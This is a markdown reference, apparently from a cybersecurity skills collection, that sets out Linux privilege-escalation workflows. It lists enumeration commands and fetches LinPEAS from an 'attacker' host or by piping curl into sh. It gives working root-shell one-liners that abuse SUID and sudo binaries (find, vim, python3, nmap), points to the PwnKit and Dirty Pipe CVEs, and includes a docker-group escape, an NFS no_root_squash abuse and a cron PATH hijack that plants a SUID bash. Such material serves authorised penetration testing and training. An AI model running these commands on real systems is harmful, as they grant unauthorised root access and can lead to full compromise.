Anthropic-Cybersecurity-Skills/skills/performing-privilege-escalation-on-linux/references/workflows.md

Linux Privilege Escalation Workflows

Workflow 1: Manual Enumeration

System Information

# OS and kernel version
uname -a
cat /etc/os-release
cat /proc/version

# Check for writable paths
find / -writable -type d 2>/dev/null
find / -writable -type f 2>/dev/null

# Network info
ip a
ss -tlnp
netstat -tulpn

SUID/SGID Binaries

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null

# Cross-reference with GTFOBins
# https://gtfobins.github.io/

Sudo Configuration

sudo -l
# Check for:
# - (ALL) NOPASSWD: /usr/bin/vim
# - (ALL) NOPASSWD: /usr/bin/find
# - (ALL) NOPASSWD: /usr/bin/python3
# - Wildcard entries: /usr/bin/rsync *

Cron Jobs

cat /etc/crontab
ls -la /etc/cron.*
crontab -l
# Monitor processes for hidden cron
# Use pspy to see processes running as root

Capabilities

getcap -r / 2>/dev/null
# Interesting capabilities:
# cap_setuid - python3, perl, ruby
# cap_dac_override - any binary
# cap_net_raw - tcpdump

Workflow 2: Automated Enumeration

LinPEAS

# Download and run
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Or transfer and run
wget http://attacker/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh -a 2>&1 | tee linpeas_output.txt

Linux Exploit Suggester

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Workflow 3: Common Exploitation

SUID Binary Exploitation (GTFOBins)

# /usr/bin/find with SUID
find . -exec /bin/sh -p \; -quit

# /usr/bin/python3 with SUID
python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# /usr/bin/vim with SUID
vim -c ':!sh'

# /usr/bin/nmap with SUID (old versions)
nmap --interactive
!sh

Sudo Abuse Examples

# sudo vim
sudo vim -c ':!sh'

# sudo find
sudo find / -exec /bin/sh \; -quit

# sudo python3
sudo python3 -c 'import pty; pty.spawn("/bin/bash")'

# sudo env with LD_PRELOAD
# If env_keep+=LD_PRELOAD is set:
# Compile shared object that spawns shell
# sudo LD_PRELOAD=/tmp/exploit.so /usr/bin/any_allowed_command

PwnKit (CVE-2021-4034)

# Check if vulnerable
pkexec --version
# Vulnerable: polkit < 0.120

# Multiple public exploits available
# Usage: compile and run - instant root

Dirty Pipe (CVE-2022-0847)

# Check kernel version
uname -r
# Vulnerable: 5.8 <= kernel < 5.16.11, 5.15.25, 5.10.102

# Exploit overwrites read-only files via pipe splice

Workflow 4: Advanced Techniques

Docker Escape (if user is in docker group)

# Check group membership
id
# If in docker group:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

NFS Root Squashing Bypass

# Check NFS exports
showmount -e target
cat /etc/exports
# If no_root_squash is set:
# Mount share, create SUID binary, execute on target

PATH Hijacking in Cron

# If cron job uses relative paths:
# Create malicious binary in writable PATH directory
echo '#!/bin/bash\ncp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' > /tmp/command_name
chmod +x /tmp/command_name
# Wait for cron to execute, then:
/tmp/rootbash -p